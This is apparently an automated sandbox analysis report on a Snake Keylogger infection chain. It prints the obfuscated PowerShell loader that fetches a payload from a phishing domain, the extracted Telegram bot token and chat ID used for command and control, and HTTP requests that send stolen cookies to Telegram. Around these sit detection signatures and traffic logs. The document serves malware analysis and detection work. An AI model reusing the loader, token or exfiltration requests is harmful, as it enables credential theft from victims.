              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BailDStrmoimpawBetjnHerrlAnamo DowaTun d SvaFBe.uiJubilTopke
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7016, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:09.377332+010028033053Unknown Traffic192.168.2.849697104.21.80.1443TCP
              2025-03-12T19:16:29.511136+010028033053Unknown Traffic192.168.2.849705104.21.80.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:03.382838+010028032742Potentially Bad Traffic192.168.2.849695158.101.44.24280TCP
              2025-03-12T19:16:06.742138+010028032742Potentially Bad Traffic192.168.2.849695158.101.44.24280TCP
              2025-03-12T19:16:10.179713+010028032742Potentially Bad Traffic192.168.2.849698158.101.44.24280TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:15:58.878192+010028032702Potentially Bad Traffic192.168.2.849694185.159.153.17443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:50.248199+010018100081Potentially Bad Traffic192.168.2.849713149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-12T19:16:41.818758+010018100071Potentially Bad Traffic192.168.2.849712149.154.167.220443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://ooriginalused.com/lord/ReimaginAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/uAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.comAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagiAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/loAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimagineAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lordAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lorAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/RAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReiAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.pAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.Avira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimaAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmPAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/Reimagine.prmXRAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binMAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/know/HFJSDskkfpVJaPaR167.binAvira URL Cloud: Label: phishing
              Source: https://ooriginalused.com/lord/ReimAvira URL Cloud: Label: phishing
              Found malware configuration
              Source: 0000000F.00000002.2230198077.0000000020AD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8", "Chat_id": "1503224244", "Version": "4.4"}
              Source: msiexec.exe.5216.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendMessage"}
              Multi AV Scanner detection for submitted file
              Source: 4500149631.vbeVirustotal: Detection: 29%Perma Link
              Source: 4500149631.vbeReversingLabs: Detection: 15%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678340 CryptUnprotectData,15_2_20678340
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20678A99 CryptUnprotectData,15_2_20678A99
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49699 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49701 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49682 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.159.153.17:443 -> 192.168.2.8:49694 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb source: powershell.exe, 00000006.00000002.1577977343.00000000005EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandlerV source: powershell.exe, 00000006.00000002.1609854802.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065D069h15_2_2065CDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20653308h15_2_20652EF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20652D41h15_2_20652A90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_20650040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065EED1h15_2_2065EC28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065F781h15_2_2065F4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065F329h15_2_2065F080
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065FBD9h15_2_2065F930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065D919h15_2_2065D670
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20653308h15_2_20653236
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065D4C1h15_2_2065D218
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20653308h15_2_20652EED
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065DD71h15_2_2065DAC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065E621h15_2_2065E378
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065E1C9h15_2_2065DF20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20650D0Dh15_2_20650B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206516F8h15_2_20650B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2065EA79h15_2_2065E7D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20678E28h15_2_20678B58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20677A5Dh15_2_20677720
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067AE50h15_2_2067AB80
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067F338h15_2_2067F068
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20677119h15_2_20676E70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20674D21h15_2_20674A78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067C548h15_2_2067C278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206702E9h15_2_20670040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067D310h15_2_2067D040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20671CF9h15_2_20671A50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067A520h15_2_2067A250
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206748C9h15_2_20674620
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206762DBh15_2_20676030
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206732B1h15_2_20673008
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067E0D8h15_2_2067DE08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20676CC1h15_2_20676A18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067B2E8h15_2_2067B018
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067A9B8h15_2_2067A6E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20670B99h15_2_206708F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20677571h15_2_206772C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20675179h15_2_20674ED0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067D7A8h15_2_2067D4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067E570h15_2_2067E2A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20672151h15_2_20671EA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067B780h15_2_2067B4B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20679758h15_2_20679488
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20670741h15_2_20670498
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067DC40h15_2_2067D970
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20670FF1h15_2_20670D48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067BC18h15_2_2067B948
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20672A01h15_2_20672758
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067FC28h15_2_2067F958
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20679BF0h15_2_20679920
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206755D1h15_2_20675328
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067EA08h15_2_2067E738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206725A9h15_2_20672300
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067F7A8h15_2_2067F500
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067C9E0h15_2_2067C710
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067C0B0h15_2_2067BDE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206792C0h15_2_20678FF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206718A1h15_2_206715F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20676869h15_2_206765C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20674471h15_2_206741C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067EEA0h15_2_2067EBD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20675E81h15_2_20675BD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20671449h15_2_206711A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067CE78h15_2_2067CBA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20672E59h15_2_20672BB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2067A088h15_2_20679DB8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20675A29h15_2_20675780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20694641h15_2_20694348
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20694B09h15_2_20694810
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20693F69h15_2_20693BF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069FBF1h15_2_2069F8F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20692338h15_2_20692068
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20695961h15_2_20695668
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069F261h15_2_2069EF68
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20693A30h15_2_20693760
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069C759h15_2_2069C460
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069AF71h15_2_2069AC78
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20690C40h15_2_20690970
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20698469h15_2_20698170
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069DF41h15_2_2069DC48
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20690310h15_2_20690040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069B439h15_2_2069B140
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20699C51h15_2_20699958
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20697149h15_2_20696E50
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069CC21h15_2_2069C928
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069A119h15_2_20699E20
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20691A08h15_2_20691738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20698931h15_2_20698638
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20693100h15_2_20692E30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20695E29h15_2_20695B30
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069F729h15_2_2069F430
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206910D8h15_2_20690E08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069B901h15_2_2069B608
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206927D1h15_2_20692500
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20698DF9h15_2_20698B00
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20697611h15_2_20697318
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069E40Ah15_2_2069E110
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069A5E1h15_2_2069A2E8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20697AD9h15_2_206977E0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206962F1h15_2_20695FF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069D0E9h15_2_2069CDF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20693598h15_2_206932C8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206992C1h15_2_20698FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206967B9h15_2_206964C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 206907A8h15_2_206904D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20694FD1h15_2_20694CD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069E8D1h15_2_2069E5D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20691EA0h15_2_20691BD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069BDC9h15_2_2069BAD0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20697FA1h15_2_20697CA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20691570h15_2_206912A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20695499h15_2_206951A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069ED99h15_2_2069EAA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069D5B1h15_2_2069D2B8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069AAA9h15_2_2069A7B0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20696C81h15_2_20696988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069DA79h15_2_2069D780
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20692C68h15_2_20692998
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 2069C291h15_2_2069BF98
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20699789h15_2_20699490
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20ABF8E9h15_2_20ABF640
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20ABFD41h15_2_20ABFA98

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49712 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49713 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/03/2025%20/%2008:42:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd636367b0dda3Host: api.telegram.orgContent-Length: 742
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
              Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49698 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49697 -> 104.21.80.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49705 -> 104.21.80.1:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49694 -> 185.159.153.17:443
              Source: global trafficHTTP traffic detected: GET /lord/Reimagine.prm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ooriginalused.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /know/HFJSDskkfpVJaPaR167.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ooriginalused.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
